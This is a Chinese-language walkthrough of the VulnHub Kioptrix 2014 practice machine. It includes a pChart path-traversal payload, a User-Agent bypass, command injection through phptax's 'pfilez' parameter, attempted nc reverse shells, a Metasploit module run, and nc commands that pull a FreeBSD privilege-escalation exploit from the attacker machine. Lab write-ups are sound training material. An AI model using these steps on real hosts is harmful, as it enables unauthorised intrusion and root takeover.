VulnHub - Kioptrix 2014

环境说明：

靶机：172.21.137.125
Kali：172.21.137.36

渗透过程：

1. 开始信息收集，命令:arp-scan -l ，找到ip为172.21.137.125(靶机开关前后各扫一次，看多的那个就是)
   

2. 用nmap命令nmap -n -sV --open -p- -T4 172.21.137.125，仅有80和8080端口开着，用的还是Apache 2.2.21服务的
   

3. 两个端口都访问下，80端口是欢迎页面，8080端口限制了访问
   
   

4. 继续用dirsearch工具./dirsearch.py --random-agents -u 'http://172.21.137.125/' -e *扫目录，没有发现任何有价值的东西
   

5. EMMM，陷入僵局，难道要看网页源码，不看不知道一看吓一跳，发现隐藏路径
   

6. 访问后发现是pChart后台
   

7. 大概点了下各个标签栏，且用dirsearch仅扫到一些没什么用的目录遍历，没有收获，查一下谷歌，发现pChart有文件包含漏洞，并有相应exp
   

8. 根据exp来操作，确实存在本地文件包含漏洞
   

9. 但是光有这个漏洞还是不好利用啊，能读的文件难道要一个个猜吗，只能从现有的信息来猜文件，头疼，试试看读apache文件，根据火狐浏览器插件Wappalyzer获取到，操作系统为FreeBSD，那么apache路径应该和Kali及Ubuntu里的有所出入
   

10. 继续谷歌资料，发现*，有相关回答，但是正确回答给出的路径还是不对，但其下方的一各回答正好给了相关WIKI链接
    

11. 根据该网站，匹配下当前靶机的信息，获取到apache在FredBSD系统上的默认路径
    
    

12. 二话不说，直接访问配置文件，路径%2f..%2f..%2fusr/local/etc/apache22/httpd.conf，发现一处刺眼的，关于8080端口的访问控制信息，网上查了下，知道了Allow from env=Mozilla4_browser的意思是，只有Mozilla4的浏览器才可访问8080端口
    

13. 那就好说了，立马装上可更改user agent的相关插件，更改userAgent为Mozilla4即可，改好记得一定要Apply应用
    

14. 更改好浏览器userAgent，访问下8080，一下子可访问了，而且暴露了phptax目录
    

15. 进入该phptax目录，发现是预览PDF的系统
    

16. 尝试点一下view，发现该功能并没有用，点make似乎也只是刷新一下，尝试在链接中加引号引发sql报错也没有成效，看来需要换思路

17. 用dirsearch工具的命令./dirsearch.py --ua='Mozilla/4.0 (Windows NT 10.0; Win64; x64; rv:71.0)' -u 'http://172.21.137.125:8080/phptax/' -e *扫下目录（这里也要加改过的userAgent参数，不然没法扫），发现其存在/data/pdf/目录，重要的是还有黑客才执行的命令
    

18. 根据该目录和文件名猜测，很有可能是某个地方存在读文件功能的同时，还能执行命令！恰好phptax是读pdf文件的地方，岂不是一拍即合！？

19. 看了下点make的链接，发现只有pfilez参数后的才有效，比如这样pfilez=1040pg1.tob;aaaa&pdf=make，回车后，再点下make按钮，就出现在了data/pdf/目录下了，看来地方是找对了！
    

20. 之后试了下NC，尝试执行nc命令或者bash的命令来反连Kali，都以失败告终，bash命令根本没用，nc可以反连成功，但是瞬间就断掉了，需要换个思路

21. 实在想不到了，谷歌一下，发现phptax早有EXP可用，哎，亏我费那么大功夫
    

22. 不过直接在链接中更改参数来反连，这个太低效了，而且不稳定，直接去msf用命令search phptax搜，果然有
    

23. use一下，再查看参数，需要靶机地址和端口
    

24. set RHOSTS 172.21.137.125，再set RPORT 8080，更改完毕后直接run，成功拿到SHELL
    

25. 但是whoami一下发现不是root用户，看来要提权，uname -a获取到靶机系统为FreeBSD 9.0的，也查到有相应EXP可用，附上地址，但用不了wget命令，没法直接从kali那下载过来，而且使用了msf远程打EXP也不成功，充满绝望！！！

26. 实在不行，网上查资料发现可用nc来传输文件，现在kali上新建名为sys.c文件，并把EXP的代码内容复制进去

27. 然后用nc命令开启端口，并把文件输入重定向。命令nc -lvp 1234 < sys.c
    

28. 靶机这里先进入/tmp目录下，然后用命令nc -nv 172.21.137.36 1234 > sys.c，连接靶机并把文件下载过来
    

29. 直接命令gcc sys.c编译该文件（这里说明一下，该EXP的注释中没有提到如何使用，所以直接编译即可）

30. 编译完成后，会获得 a.out 的文件
    

31. 废话不多说，直接./a.out运行，完成后whoami一下，成功提权到root身份！！！结束！！！: )
    
    PS：至于最后要不要改密码，看个人喜好，就不操作了。

参考链接：

• https://www.vulnhub.com/entry/kioptrix-2014-5,62/
• https://*.com/questions/12202021/lost-httpd-conf-file-located-apache
• https://cwiki.apache.org/confluence/display/HTTPD/DistrosDefaultLayout#DistrosDefaultLayout-FreeBSD6.1(Apachehttpd2.2):
• https://www.exploit-db.com/exploits/31173
• https://www.exploit-db.com/exploits/21665
• https://www.google.com/search?q=freebsd+9.0+privilege+escalation&ei=-yokXp2ZCYKJmAWu3bzQAw&start=10&sa=N&ved=2ahUKEwjdgtuGto_nAhWCBKYKHa4uDzoQ8tMDegQICxAv&biw=1920&bih=969
• https://www.exploit-db.com/exploits/28718
• https://jhalon.github.io/vulnhub-kioptrix5/